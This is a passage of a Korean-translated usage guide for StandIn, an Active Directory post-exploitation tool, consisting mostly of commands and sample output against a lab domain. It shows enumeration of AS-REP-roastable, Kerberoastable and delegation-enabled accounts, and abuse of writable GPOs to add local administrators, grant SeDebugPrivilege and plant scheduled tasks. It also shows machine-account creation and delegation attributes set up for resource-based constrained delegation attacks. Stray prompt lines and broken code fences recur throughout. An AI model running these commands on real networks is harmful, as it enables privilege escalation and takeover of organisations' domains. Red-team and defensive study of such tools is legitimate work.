[*] SamAccountName : user005 DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD

[+] Updating userAccountControl.. |_ Success

C:> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 1 object(s) that do not require Kerberos preauthentication..

[*] SamAccountName : user005 DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

C:> StandIn.exe --object "samaccountname=user005" --asrep --remove

[?] Using DC : m-w16-dc01.main.redhook.local [?] Object : CN=User 005 Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[*] SamAccountName : user005 DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

[+] Updating userAccountControl.. |_ Success

C:> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 0 object(s) that do not require Kerberos preauthentication..

root@kitploit:~
## SID

#### 사용 사례

> *때로는 `SID` 또는 `samAccountName` 중 하나를 가지고 있고 다른 하나를 가져와야 할 때가 있습니다. 이는 이를 위한 간단한 도우미 함수입니다.*

#### 구문

`SID` 또는 `samAccountName`을 사용자의 `SID` 및 `NTAccount`로 변환합니다.```
C:\> StandIn.exe --sid user001

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=user 001
    Path     : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local

[+] User     : REDHOOK.LOCAL\user001
    SID      : S-1-5-21-315358687-3711474269-2098994107-1105

C:\> StandIn.exe --sid S-1-5-21-315358687-3711474269-2098994107-1105

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=user 001
    Path     : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local

[+] User     : REDHOOK.LOCAL\user001
    SID      : S-1-5-21-315358687-3711474269-2098994107-1105

ASREP

사용 사례

이 함수는 현재 활성화되어 있으며 userAccountControl 플래그의 일부로 DONT_REQUIRE_PREAUTH를 가지고 있는 AD의 모든 계정을 열거합니다. 이러한 계정은 AS-REP 로스팅(roasting)이 가능하며, 이 과정은 케르베로스팅(kerberoasting)과 매우 유사합니다.

구문

ASREP 로스팅이 가능한 모든 계정을 반환합니다.``` C:> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 1 object(s) that do not require Kerberos preauthentication..

[*] SamAccountName : user005 DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

root@kitploit:~
## PASSWD_NOTREQD

#### 사용 사례

> *이 함수는 현재 활성화되어 있으며 `userAccountControl` 플래그의 일부로 `PASSWD_NOTREQD`가 설정된 AD의 모든 계정을 열거합니다. 이 계정들은 GPO 적용에도 불구하고 빈 암호를 가질 수 있지만, 암호가 구성되어 있을 수도 있습니다.*

#### 구문

`PASSWD_NOTREQD`가 설정된 모든 계정을 반환합니다.```
C:\> StandIn.exe --passnotreq

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 2 object(s) that do not require a password..

[*] SamAccountName           : passnotreq
    DistinguishedName        : CN=passnotreq,CN=Users,DC=redhook,DC=local
    PwdLastSet               : 6/6/2021 10:47:27 PM UTC
    lastlogon                : 0x0
    userAccountControl       : PASSWD_NOTREQD, NORMAL_ACCOUNT

[*] SamAccountName           : REDHOOKSLSRV$
    DistinguishedName        : CN=RedHookSLSRV,CN=Computers,DC=redhook,DC=local
    PwdLastSet               : 6/6/2021 10:51:37 PM UTC
    lastlogon                : 0x0
    userAccountControl       : PASSWD_NOTREQD, WORKSTATION_TRUST_ACCOUNT

SPN

이 함수들은 SPN을 구체적으로 다룹니다.

SPN 수집

사용 사례

이 함수는 현재 활성화되어 있고 Kerberoast가 가능한 AD의 모든 계정을 열거합니다. 컨텍스트를 위해 기본 계정 정보(비밀번호 마지막 설정 시기, 계정 마지막 사용 시기, 지원되는 암호화 유형)가 추가됩니다.

구문

Kerberoast가 가능한 모든 계정을 반환합니다.``` C:> StandIn.exe --spn

[?] Using DC : m-w16-dc01.main.redhook.local [?] Found 1 kerberostable users..

[*] SamAccountName : SimCritical DistinguishedName : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local ServicePrincipalName : ldap/M-2012R2-03.main.redhook.local PwdLastSet : 11/2/2020 7:06:17 PM UTC lastlogon : 0x0 Supported ETypes : RC4_HMAC_DEFAULT

root@kitploit:~
### SPN 설정

#### 사용 사례

> *적절한 권한이 있으면 이 함수를 사용하여 `samAccountName`에서 `SPN`을 추가 및 제거할 수 있습니다.*

#### 구문

`samAccountName`에서 `SPN's`을 추가 및 제거합니다.```
C:\> StandIn.exe --setspn user001 --principal MSSQL/Alchimiae --add

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=user 001
    Path     : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local

[*] SamAccountName         : user001
    DistinguishedName      : CN=user 001,CN=Users,DC=redhook,DC=local

[+] Adding servicePrincipalName : MSSQL/Alchimiae
    |_ Success

C:\> StandIn.exe --object samaccountname=user001 --filter serviceprincipalname

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=user 001
    Path     : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local

[?] Iterating object properties
    |_ Applying property filter => serviceprincipalname

[+] serviceprincipalname
    |_ HTTP/Alchimiae
    |_ MSSQL/Alchimiae

C:\>StandIn.exe --setspn user001 --principal HTTP/Alchimiae --remove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=user 001
    Path     : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local

[*] SamAccountName         : user001
    DistinguishedName      : CN=user 001,CN=Users,DC=redhook,DC=local
    ServicePrincipalName   : HTTP/Alchimiae
                             MSSQL/Alchimiae

[+] Removing servicePrincipalName : HTTP/Alchimiae
    |_ Success

C:\> StandIn.exe --object samaccountname=user001 --filter serviceprincipalname

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=user 001
    Path     : LDAP://CN=user 001,CN=Users,DC=redhook,DC=local

[?] Iterating object properties
    |_ Applying property filter => serviceprincipalname

[+] serviceprincipalname
    |_ MSSQL/Alchimiae

제한 없음 / 제한 있음 / 리소스 기반 제한 위임

사용 사례

이 함수는 제한 없음, 제한 있음 또는 리소스 기반 제한 위임을 수행하도록 허용된 모든 계정을 열거합니다. 이러한 자산은 접근 권한을 확장하거나 목표를 달성하는 데 사용될 수 있습니다.

구문

제한 없음 또는 제한 있음 위임 권한이 있거나, 인바운드 리소스 기반 제한 위임 권한이 있는 모든 계정을 반환합니다.``` C:> StandIn.exe --delegation

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 3 object(s) with unconstrained delegation..

[*] SamAccountName : M-2019-03$ DistinguishedName : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[*] SamAccountName : M-W16-DC01$ DistinguishedName : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[*] SamAccountName : M-W19-DC01$ DistinguishedName : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[?] Found 2 object(s) with constrained delegation..

[*] SamAccountName : M-2019-04$ DistinguishedName : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local HOST/m-w16-dc01.main.redhook.local HOST/M-W16-DC01 HOST/m-w16-dc01.main.redhook.local/MAIN HOST/M-W16-DC01/MAIN Protocol Transition : False userAccountControl : WORKSTATION_TRUST_ACCOUNT

[*] SamAccountName : M-2019-05$ DistinguishedName : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local cifs/M-2012R2-03 Protocol Transition : True userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[?] Found 1 object(s) with resource-based constrained delegation..

[*] SamAccountName : M-10-1909-01$ DistinguishedName : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local Inbound Delegation : Server Admins [GROUP] userAccountControl : WORKSTATION_TRUST_ACCOUNT

root@kitploit:~
## DC's

#### 사용 사례

> *이 함수는 모든 도메인 컨트롤러를 찾아 역할 할당을 포함한 일부 속성을 나열하여 상황 인식을 제공합니다.*

#### 구문

모든 도메인 컨트롤러를 가져옵니다.```
C:\> StandIn.exe --dc

[?] Using DC    : m-w16-dc01.main.redhook.local
    |_ Domain   : main.redhook.local

[*] Host                  : m-w16-dc01.main.redhook.local
    Domain                : main.redhook.local
    Forest                : main.redhook.local
    SiteName              : Default-First-Site-Name
    IP                    : 10.42.54.5
    OSVersion             : Windows Server 2016 Datacenter
    Local System Time UTC : Tuesday, 03 November 2020 03:29:17
    Role                  : SchemaRole
                            NamingRole
                            PdcRole
                            RidRole
                            InfrastructureRole

[*] Host                  : m-w19-dc01.main.redhook.local
    Domain                : main.redhook.local
    Forest                : main.redhook.local
    SiteName              : Default-First-Site-Name
    IP                    : 10.42.54.13
    OSVersion             : Windows Server 2019 Datacenter
    Local System Time UTC : Tuesday, 03 November 2020 03:29:17

트러스트

사용 사례

이 함수는 모든 도메인 트러스트를 찾아 상황 인식을 제공합니다.

구문

현재 도메인의 모든 트러스트 관계를 가져옵니다.``` C:> StandIn.exe --trust

[?] Using DC : m-w16-dc01.main.redhook.local |_ Domain : main.redhook.local

[>] Source : main.redhook.local Target : redhook.local TrustDirection : Bidirectional TrustType : ParentChild

root@kitploit:~
## GPO 작업

이 기능들은 GPO 조작을 구체적으로 다룹니다.

### GPO 목록

#### 사용 사례

> *이 함수는 도메인의 `Group Policy` 객체를 모두 열거할 수 있습니다. 선택적으로 와일드카드 `--filter`와 `--limit`를 사용하여 반환되는 항목 수를 제한할 수 있습니다. 또한 `--acl`을 사용하여 GPO 객체의 ACL을 조회할 수 있습니다.*

#### 구문

GPO 객체를 열거하고 GPO ACL을 검토합니다.```
C:\> StandIn.exe --gpo

[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO result count         : 3
    |_ Result limit          : 50

[?] Object   : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}
    Path     : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=redhook,DC=local
    DisplayName              : Default Domain Controllers Policy
    CN                       : {6AC1786C-016F-11D2-945F-00C04fB984F9}
    GPCFilesysPath           : \\redhook.local\sysvol\redhook.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
    GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
    WhenCreated              : 6/3/2021 10:30:25 AM
    WhenChanged              : 6/3/2021 10:30:25 AM

[?] Object   : CN={31B2F340-016D-11D2-945F-00C04FB984F9}
    Path     : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=redhook,DC=local
    DisplayName              : Default Domain Policy
    CN                       : {31B2F340-016D-11D2-945F-00C04FB984F9}
    GPCFilesysPath           : \\redhook.local\sysvol\redhook.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
    GPCMachineExtensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
    WhenCreated              : 6/3/2021 10:30:25 AM
    WhenChanged              : 6/5/2021 11:59:55 PM

[?] Object   : CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66}
    Path     : LDAP://CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66},CN=Policies,CN=System,DC=redhook,DC=local
    DisplayName              : Shards
    CN                       : {028A7368-C524-46AA-B27A-CE8BDAC4EA66}
    GPCFilesysPath           : \\redhook.local\SysVol\redhook.local\Policies\{028A7368-C524-46AA-B27A-CE8BDAC4EA66}
    GPCMachineExtensionnames : [{827D319E-6EAC-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
    WhenCreated              : 6/4/2021 2:11:43 PM
    WhenChanged              : 6/4/2021 11:33:33 PM

C:\> StandIn.exe --gpo --filter Shards --acl

[?] Using DC : m-w16-dc01.main.redhook.local
[+] GPO result count         : 1
    |_ Result limit          : 50
    |_ Applying search filter

[?] Object   : CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66}
    Path     : LDAP://CN={028A7368-C524-46AA-B27A-CE8BDAC4EA66},CN=Policies,CN=System,DC=redhook,DC=local
    GPCFilesysPath : \\redhook.local\SysVol\redhook.local\Policies\{028A7368-C524-46AA-B27A-CE8BDAC4EA66}
    Path           : OK

[+] Account       : CREATOR OWNER
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : InheritOnly

[+] Account       : NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
    Type          : Allow
    Rights        : ReadAndExecute, Synchronize
    Inherited ACE : False
    Propagation   : None

[+] Account       : NT AUTHORITY\Authenticated Users
    Type          : Allow
    Rights        : ReadAndExecute, Synchronize
    Inherited ACE : False
    Propagation   : None

[+] Account       : NT AUTHORITY\SYSTEM
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

[+] Account       : REDHOOK\Domain Admins
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

[+] Account       : REDHOOK\Enterprise Admins
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

[+] Account       : REDHOOK\user001
    Type          : Allow
    Rights        : FullControl
    Inherited ACE : False
    Propagation   : None

GPO 로컬 관리자 추가

적절한 권한이 있다면 취약한 GPO에서 BUILTIN\Administrators에 도메인 사용자를 추가할 수 있습니다.

구문

Shards GPO에 연결된 모든 컴퓨터 개체에 대해 BUILTIN\Administrators 그룹에 사용자를 추가합니다. 이 함수는 필요한 파일을 생성하고 기존 파일을 업데이트할 수도 있습니다. 주의해서 사용하세요.``` C:> StandIn.exe --gpo --filter Shards --localadmin user002

[?] Using DC : m-w16-dc01.main.redhook.local

[+] GPO Object Found Object : CN={58890948-8DE3-4A39-8C40-F68004186693} Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local GP Path : \redhook.local\SysVol\redhook.local\Policies{58890948-8DE3-4A39-8C40-F68004186693}

[+] User Object Found Object : CN=user 002 Path : LDAP://CN=user 002,CN=Users,DC=redhook,DC=local SID : S-1-5-21-315358687-3711474269-2098994107-1106

[?] GPO Version User : 0 Computer : 0

[+] Writing GPO changes |_ Creating GptTmpl.inf |_ Updating gpt.inf |_ Updating AD object |_ Incrementing version number |_ Creating gPCMachineExtensionNames

root@kitploit:~
### GPO 사용자 권한 추가

> *적절한 권한이 있으면 취약한 GPO의 도메인 사용자에 대해 토큰 권한을 활성화할 수 있습니다.*

#### 구문

`Shards` GPO와 연결된 모든 컴퓨터 개체에 대해 사용자 계정에 `token` 권한을 추가합니다. 이 함수는 필요한 파일을 생성하고 기존 파일을 업데이트할 수 있습니다. **주의해서 사용하세요.**```
C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege"

[+] Validating account rights
    |_ Rights count: 2
       |_ SeDebugPrivilege
       |_ SeLoadDriverPrivilege

[?] Using DC : m-w16-dc01.main.redhook.local

[+] GPO Object Found
    Object   : CN={58890948-8DE3-4A39-8C40-F68004186693}
    Path     : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
    GP Path  : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}

[+] User Object Found
    Object   : CN=user 002
    Path     : LDAP://CN=user 002,CN=Users,DC=redhook,DC=local
    SID      : S-1-5-21-315358687-3711474269-2098994107-1106

[?] GPO Version
    User     : 0
    Computer : 1

[+] Writing GPO changes
    |_ Updating existing GptTmpl.inf
       |_ Adding GPO Privileges
       |_ Updating revision
    |_ Updating gpt.inf
    |_ Updating AD object
       |_ Incrementing version number
       |_ Updating gPCMachineExtensionNames

GPO 즉시 작업 추가

적절한 권한이 있으면 GPO의 사용자 또는 컴퓨터 구성 요소에 즉시 작업을 추가할 수 있습니다. 선택적으로 이 작업은 단일 사용자 또는 단일 컴퓨터에만 적용되도록 좁힐 수 있습니다.

구문

Shards GPO에 연결된 모든 컴퓨터 개체에 대해 실행될 일반 컴퓨터 작업을 추가합니다. 또한 특정 도메인 사용자에 대해서만 실행될 대상 사용자 작업을 추가합니다. 이 함수는 필요한 파일을 생성할 뿐만 아니라 기존 파일을 업데이트할 수도 있습니다. 주의해서 사용하세요.``` C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args"

[?] Using DC : m-w16-dc01.main.redhook.local

[+] GPO Object Found Object : CN={58890948-8DE3-4A39-8C40-F68004186693} Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local GP Path : \redhook.local\SysVol\redhook.local\Policies{58890948-8DE3-4A39-8C40-F68004186693}

[?] GPO Version User : 0 Computer : 2

[+] Writing GPO changes |_ Creating ScheduledTasks.xml |_ Updating gpt.inf |_ Updating AD object |_ Incrementing version number |_ Updating gPCMachineExtensionNames

C:> StandIn.exe --gpo --filter Shards --tasktype user --taskname Ivonis --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args" --target "REDHOOK\user001" --targetsid S-1-5-21-315358687-3711474269-2098994107-1105

[?] Using DC : m-w16-dc01.main.redhook.local

[+] GPO Object Found Object : CN={58890948-8DE3-4A39-8C40-F68004186693} Path : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local GP Path : \redhook.local\SysVol\redhook.local\Policies{58890948-8DE3-4A39-8C40-F68004186693}

[?] GPO Version User : 0 Computer : 3

[+] Writing GPO changes |_ Creating ScheduledTasks.xml |_ Updating gpt.inf |_ Updating AD object |_ Incrementing version number |_ Creating gPCUserExtensionNames

root@kitploit:~
### GPO 사용자/컴퓨터 버전 증가

> *이전 GPO 함수들은 강력한 익스플로잇 프리미티브를 제공하지만, `SysVol`에서 `GPO's`를 수동으로 편집할 수 있는 기능이 유용할 수 있습니다. GPO가 수동으로 수정된 후에는 AD 객체 버전을 동기화하여 변경 사항이 올바르게 전파되도록 해야 합니다. 이 함수는 그 작업을 수행합니다.*

#### 구문

연결된 AD 객체에서 `User` 또는 `Computer` GPO 버전을 증가시킵니다.```
C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --increase --tasktype user

[?] Using DC : m-w16-dc01.main.redhook.local

[+] GPO Object Found
    Object   : CN={58890948-8DE3-4A39-8C40-F68004186693}
    Path     : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
    GP Path  : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}

[?] Current GPO Versioning
    User     : 1
    Computer : 3

--> Incrementing user version

C:\Users\user001\Desktop>StandIn.exe --gpo --filter Shards --increase --tasktype computer

[?] Using DC : m-w16-dc01.main.redhook.local

[+] GPO Object Found
    Object   : CN={58890948-8DE3-4A39-8C40-F68004186693}
    Path     : LDAP://CN={58890948-8DE3-4A39-8C40-F68004186693},CN=Policies,CN=System,DC=redhook,DC=local
    GP Path  : \\redhook.local\SysVol\redhook.local\Policies\{58890948-8DE3-4A39-8C40-F68004186693}

[?] Current GPO Versioning
    User     : 2
    Computer : 3

--> Incrementing computer version

정책

사용 사례

이 기능은 상황 인식을 위한 기본 정책 정보를 표시합니다.

구문

Default Domain Policy를 읽고 사용자/세션 정책 정보를 추출합니다. 기본 정책의 이름이 변경된 경우 --filter로 지정할 수 있으며, 또는 도메인 루트에 대해 --object 쿼리를 수행할 수 있습니다(예: distinguishedname=DC=redhook,DC=local).``` C:> StandIn.exe --policy

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9} Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=redhook,DC=local Policy Root : \redhook.local\sysvol\redhook.local\Policies{31B2F340-016D-11D2-945F-00C04FB984F9}

[+] Domain Policy |_ MinimumPasswordAge : 1 |_ MaximumPasswordAge : 42 |_ MinimumPasswordLength : 7 |_ PasswordComplexity : 1 |_ PasswordHistorySize : 24 |_ LockoutBadCount : 5 |_ ResetLockoutCount : 30 |_ LockoutDuration : 30 |_ LSAAnonymousNameLookup : 0 |_ Kerberos max User ticket lifetime : 10 |_ Kerberos max Service ticket lifetime : 600 |_ Kerberos max User ticket renewal lifetime : 7

root@kitploit:~
## DNS

#### 사용 사례

> *이 함수는 AD에서 도메인 DNS 정보를 가져오고 와일드카드 필터링을 지원합니다.*

#### 구문

특정 `CN=MicrosoftDNS` 개체 아래에서 DNS 항목을 읽고 바이너리 DNS 데이터를 구문 분석합니다. `search base`는 `--legacy` 또는 `--forest`를 지정하여 조정할 수 있습니다. 또한 `--limit`로 반환되는 결과를 제한할 수 있습니다.```
C:\Users\user001\Desktop>StandIn.exe --dns --filter RedHook-CLI

[+] Search Base: LDAP://DC=redhook.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=redhook,DC=local

[+] Object : RedHook-CLI-01
    |_ DNS_RPC_RECORD_A : 10.0.0.100

[+] Object : RedHook-CLI-02
    |_ DNS_RPC_RECORD_A : 10.0.0.101

그룹 작업

이 함수들은 도메인 그룹을 구체적으로 다룹니다.

그룹 구성원 나열

사용 사례

이 함수는 상황 인식을 제공하며, 도메인 그룹의 모든 구성원(사용자 또는 중첩 그룹 유형 포함)을 나열합니다. 입력으로 samAccountName을 받을 수도 있으며, 해당 사용자가 속한 그룹을 반환합니다.

구문

그룹 구성원 또는 사용자 구성원을 열거하고 구성원 객체에 대한 기본적인 세부 정보를 제공합니다.``` C:> StandIn.exe --group "Server Admins"

[?] Using DC : m-w16-dc01.main.redhook.local [?] Type : Group resolution Group : Server Admins

[+] Members

[?] Path : LDAP://CN=Workstation Admins,OU=Groups,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : Workstation Admins Type : SAM_GROUP_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1108

[?] Path : LDAP://CN=Server Admin 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : srvadmin001 Type : SAM_USER_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1111

[?] Path : LDAP://CN=Server Admin 002,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : srvadmin002 Type : SAM_USER_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1184

[?] Path : LDAP://CN=Server Admin 003,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : srvadmin003 Type : SAM_USER_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1185

[?] Path : LDAP://CN=Server Admin 004,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : srvadmin004 Type : SAM_USER_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1186

[?] Path : LDAP://CN=Server Admin 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : srvadmin005 Type : SAM_USER_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1187

[?] Path : LDAP://CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local samAccountName : SimCritical Type : SAM_USER_OBJECT SID : S-1-5-21-1293271031-3053586410-2290657902-1204

C:> StandIn.exe --group user001

[?] Using DC : m-w16-dc01.main.redhook.local [?] Type : User resolution User : user 001

[+] Memberships

[?] Path : LDAP://<SID=010500000000000515000000dffdcb125d9a38ddbb1b1c7d01020000> samAccountName : Domain Users Type : SAM_GROUP_OBJECT SID : S-1-5-21-315358687-3711474269-2098994107-513

root@kitploit:~
### 그룹에 사용자 추가 / 제거

#### 사용 사례

> *적절한 접근 권한을 가진 운영자는 도메인 그룹에서 NTAccount를 추가하거나 제거할 수 있습니다.*

#### 구문

NTAccount 식별자를 도메인 그룹에 추가합니다. 일반적으로 이것은 사용자이지만 그룹일 수도 있습니다. 마지막으로 도메인 그룹에서 NTAccount 식별자를 제거합니다.```
C:\> StandIn.exe --group lowprivbutmachineaccess

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Type     : Group resolution
    Group    : lowprivbutmachineaccess

[+] Members

[?] Path           : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
    samAccountName : s4uUser
    Type           : User
    SID            : S-1-5-21-1293271031-3053586410-2290657902-1197

C:\> StandIn.exe --group lowprivbutmachineaccess --ntaccount "MAIN\user001" --add

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group    : lowPrivButMachineAccess
    GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Adding user to group
    |_ Success

C:\> StandIn.exe --group lowprivbutmachineaccess

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Type     : Group resolution
    Group    : lowprivbutmachineaccess

[+] Members

[?] Path           : LDAP://CN=User 001,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
    samAccountName : user001
    Type           : User
    SID            : S-1-5-21-1293271031-3053586410-2290657902-1106

[?] Path           : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
    samAccountName : s4uUser
    Type           : User
    SID            : S-1-5-21-1293271031-3053586410-2290657902-1197

C:\> StandIn.exe --group testgroup --ntaccount "MAIN\user001" --remove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Group    : lowPrivButMachineAccess
    GUID     : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Removing user from group
    |_ Success

머신 개체 작업

이 함수들은 특히 머신 작업을 위한 것이며 입력으로 머신 이름을 기대합니다.

머신 개체 생성

사용 사례

운영자는 리소스 기반 제한 위임 공격을 수행하기 위해 머신 개체를 생성하려 할 수 있습니다. 기본적으로 모든 도메인 사용자는 로컬 도메인에 최대 10개의 머신을 생성할 수 있습니다.

구문

임의의 비밀번호로 새 머신 개체를 생성합니다. 사용자 ms-DS-MachineAccountQuota가 이 작업에 적용됩니다.``` C:> StandIn.exe --computer M-1337-b33f --make

[?] Using DC : m-w16-dc01.main.redhook.local |_ Domain : main.redhook.local |_ DN : CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local |_ Password : MlCGkaacS5SRUOt

[+] Machine account added to AD..

root@kitploit:~
`ms-DS-MachineAccountQuota` 속성은 도메인 루트 개체에 존재합니다. 할당량을 확인해야 하는 경우 아래와 같이 개체 검색을 수행할 수 있습니다.```
C:\> StandIn.exe --object ms-DS-MachineAccountQuota=*

머신 개체 비활성화

사용 사례

일반 사용자는 머신 개체를 삭제할 수 없지만, 머신을 생성한 사용자는 이후 해당 머신 개체를 비활성화할 수 있습니다.

구문

이전에 생성된 머신을 비활성화합니다. 이 작업은 머신을 생성한 동일한 사용자의 컨텍스트에서 수행해야 합니다. 권한이 없는 사용자는 머신 개체를 삭제할 수 없으며 비활성화만 가능합니다.``` C:> StandIn.exe --computer M-1337-b33f --disable

[?] Using DC : m-w16-dc01.main.redhook.local [?] Object : CN=M-1337-b33f Path : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local

[+] Machine account currently enabled |_ Account disabled..

root@kitploit:~
### 머신 개체 삭제

#### 사용 사례

> *상승된 AD 권한을 사용하여 운영자는 공격 체인에서 이전에 생성된 머신 개체를 삭제할 수 있습니다.*

#### 구문

상승된 컨텍스트를 사용하여 머신 개체를 삭제합니다.```
C:\> StandIn.exe --computer M-1337-b33f --delete

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object   : CN=M-1337-b33f
    Path     : LDAP://CN=M-1337-b33f,CN=Computers,DC=main,DC=redhook,DC=local

[+] Machine account deleted from AD

msDS-AllowedToActOnBehalfOfOtherIdentity 추가

사용 사례

머신 객체에 대한 쓰기 액세스 권한이 있는 경우, 이 함수는 운영자가 머신에 msDS-AllowedToActOnBehalfOfOtherIdentity 속성을 추가할 수 있도록 합니다. 이 속성은 리소스 기반 제한 위임 공격을 수행하는 데 필요합니다.

구문

머신에 msDS-AllowedToActOnBehalfOfOtherIdentity 속성과 함께 SID를 추가하여 리소스 기반 제한 위임을 사용한 호스트 장악을 용이하게 합니다.``` C:> StandIn.exe --computer m-10-1909-03 --sid S-1-5-21-1293271031-3053586410-2290657902-1205

